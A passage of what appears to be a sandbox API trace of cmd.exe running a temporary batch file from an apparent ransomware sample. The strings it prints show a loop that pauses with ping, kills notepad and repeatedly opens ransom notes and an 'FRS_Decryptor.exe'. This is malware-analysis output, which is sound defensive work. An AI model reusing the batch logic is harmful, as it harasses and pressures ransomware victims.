lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0091.565] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0091.565] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.565] GetFileType (hFile=0x2a0) returned 0x1 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0091.565] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0091.565] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0091.565] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.565] GetFileType (hFile=0x2a0) returned 0x1 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0091.565] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0091.565] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0091.566] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.566] GetFileType (hFile=0x2a0) returned 0x1 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0091.566] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0091.566] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0091.566] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.566] GetFileType (hFile=0x2a0) returned 0x1 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0091.566] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0091.566] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0091.566] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.566] GetFileType (hFile=0x2a0) returned 0x1 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0091.566] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0091.566] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0091.566] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.566] GetFileType (hFile=0x2a0) returned 0x1 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0091.566] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0091.566] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0091.566] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.566] GetFileType (hFile=0x2a0) returned 0x1 [0091.566] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0091.567] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0091.567] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0091.567] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0091.567] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0091.567] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.567] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0091.567] _get_osfhandle (_FileHandle=0) returned 0x24 [0091.567] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0091.567] SetConsoleInputExeNameW () returned 0x1 [0091.567] GetConsoleOutputCP () returned 0x1b5 [0091.567] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0091.567] SetThreadUILanguage (LangId=0x0) returned 0x409 [0091.567] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0091.568] _open_osfhandle (_OSFileHandle=0x2a0, _Flags=8) returned 3 [0091.568] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.568] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0091.568] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0091.568] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0091.568] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0091.568] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0091.568] GetFileType (hFile=0x2a0) returned 0x1 [0091.568] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.568] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0091.568] _tell (_FileHandle=3) returned 2512 [0091.568] _close (_FileHandle=3) returned 0 [0091.568] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0091.568] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0091.568] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0091.568] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0091.568] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0091.568] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0091.568] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0091.568] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0091.568] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0091.568] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0091.568] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0091.568] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0091.568] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0091.568] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0091.568] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0091.568] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0091.568] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0091.568] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0091.568] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0091.568] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0091.568] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0091.568] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0091.568] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0091.568] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0091.568] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0091.568] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0091.568] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0091.569] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0091.569] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0091.569] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0091.569] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0091.569] _wcsicmp (_String1="ping", _String2="START") returned -3 [0091.569] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0091.569] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0091.569] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0091.569] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0091.569] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0091.569] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0091.569] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0091.569] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0091.569] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0091.569] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0091.569] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0091.569] SetErrorMode (uMode=0x0) returned 0x0 [0091.569] SetErrorMode (uMode=0x1) returned 0x0 [0091.569] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0091.569] SetErrorMode (uMode=0x0) returned 0x1 [0091.569] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0091.569] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0091.569] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.569] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.569] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0091.569] GetLastError () returned 0x2 [0091.569] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0f0 [0091.569] FindClose (in: hFindFile=0xd5a0f0 | out: hFindFile=0xd5a0f0) returned 1 [0091.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0091.570] GetLastError () returned 0x2 [0091.570] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0f0 [0091.570] FindClose (in: hFindFile=0xd5a0f0 | out: hFindFile=0xd5a0f0) returned 1 [0091.570] GetFileType (hFile=0x28) returned 0x2 [0091.570] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0091.570] _dup (_FileHandle=1) returned 3 [0091.570] _close (_FileHandle=1) returned 0 [0091.570] _wcsicmp (_String1="nul", _String2="con") returned 11 [0091.570] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0091.570] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0091.570] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0091.570] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0091.570] SetErrorMode (uMode=0x0) returned 0x0 [0091.570] SetErrorMode (uMode=0x1) returned 0x0 [0091.570] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0091.570] SetErrorMode (uMode=0x0) returned 0x1 [0091.570] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0091.570] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0091.570] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.571] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.571] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0091.571] GetLastError () returned 0x2 [0091.571] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.571] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0091.571] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0091.571] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0091.571] GetLastError () returned 0x2 [0091.571] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59e70 [0091.571] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0091.571] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0091.572] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0091.572] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0091.572] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0091.572] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0091.572] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0091.572] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x34c, dwProcessId=0xbb4, dwThreadId=0xbcc)) returned 1 [0091.575] CloseHandle (hObject=0x34c) returned 1 [0091.575] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0091.575] GetEnvironmentStringsW () returned 0xd2c668* [0091.575] FreeEnvironmentStringsA (penv="=") returned 1 [0091.575] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0093.643] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0093.643] CloseHandle (hObject=0x36c) returned 1 [0093.643] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0093.643] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0093.643] GetEnvironmentStringsW () returned 0xd30508* [0093.643] FreeEnvironmentStringsA (penv="=") returned 1 [0093.643] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0093.643] GetEnvironmentStringsW () returned 0xd2c668* [0093.643] FreeEnvironmentStringsA (penv="=") returned 1 [0093.643] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0093.643] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0093.643] _close (_FileHandle=3) returned 0 [0093.643] _get_osfhandle (_FileHandle=1) returned 0x28 [0093.643] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0093.644] _get_osfhandle (_FileHandle=1) returned 0x28 [0093.644] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: 